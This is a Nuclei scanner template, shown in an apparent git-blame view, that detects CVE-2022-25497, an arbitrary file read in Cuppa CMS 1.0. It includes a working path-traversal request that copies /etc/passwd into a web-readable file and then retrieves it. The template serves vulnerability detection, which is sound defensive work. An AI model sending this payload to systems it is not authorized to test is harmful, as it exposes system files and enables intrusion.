2023-04-21 08:56:01 +00:00
|
|
|
id: CVE-2022-25497
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Cuppa CMS v1.0 - Local File Inclusion
|
|
|
|
author: theamanrawat
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.
|
2023-04-21 08:56:01 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/CuppaCMS/CuppaCMS
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25497
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/ARPSyndicate/cvemon
|
2023-04-21 08:56:01 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
|
|
|
cve-id: CVE-2022-25497
|
|
|
|
cwe-id: CWE-552
|
2024-01-14 13:49:27 +00:00
|
|
|
epss-score: 0.00508
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-percentile: 0.7649
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
|
2023-04-21 08:56:01 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: cuppacms
|
|
|
|
product: cuppacms
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms
|
2023-04-21 08:56:01 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2023-04-21 08:56:01 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /js/filemanager/api/index.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{"from":"//../../../../../../../../../../../../../etc/passwd","to":"/../{{randstr}}.txt","action":"copyFile"}
|
|
|
|
- |
|
|
|
|
GET /{{randstr}}.txt HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: header_2
|
|
|
|
words:
|
|
|
|
- text/plain
|
|
|
|
|
2023-07-11 19:49:27 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
2023-04-21 08:56:01 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4a0a0047304502206c4df5d2066e6268f3acbd183dc87c66c840453a576c416933e1d15f0d828d3c022100a4a86a643deb305983a1eacca72a65d4c2a3cb0b64dafefbdfdcd898c74bc4d6:922c64590222798bb761d5b6d8e72950
|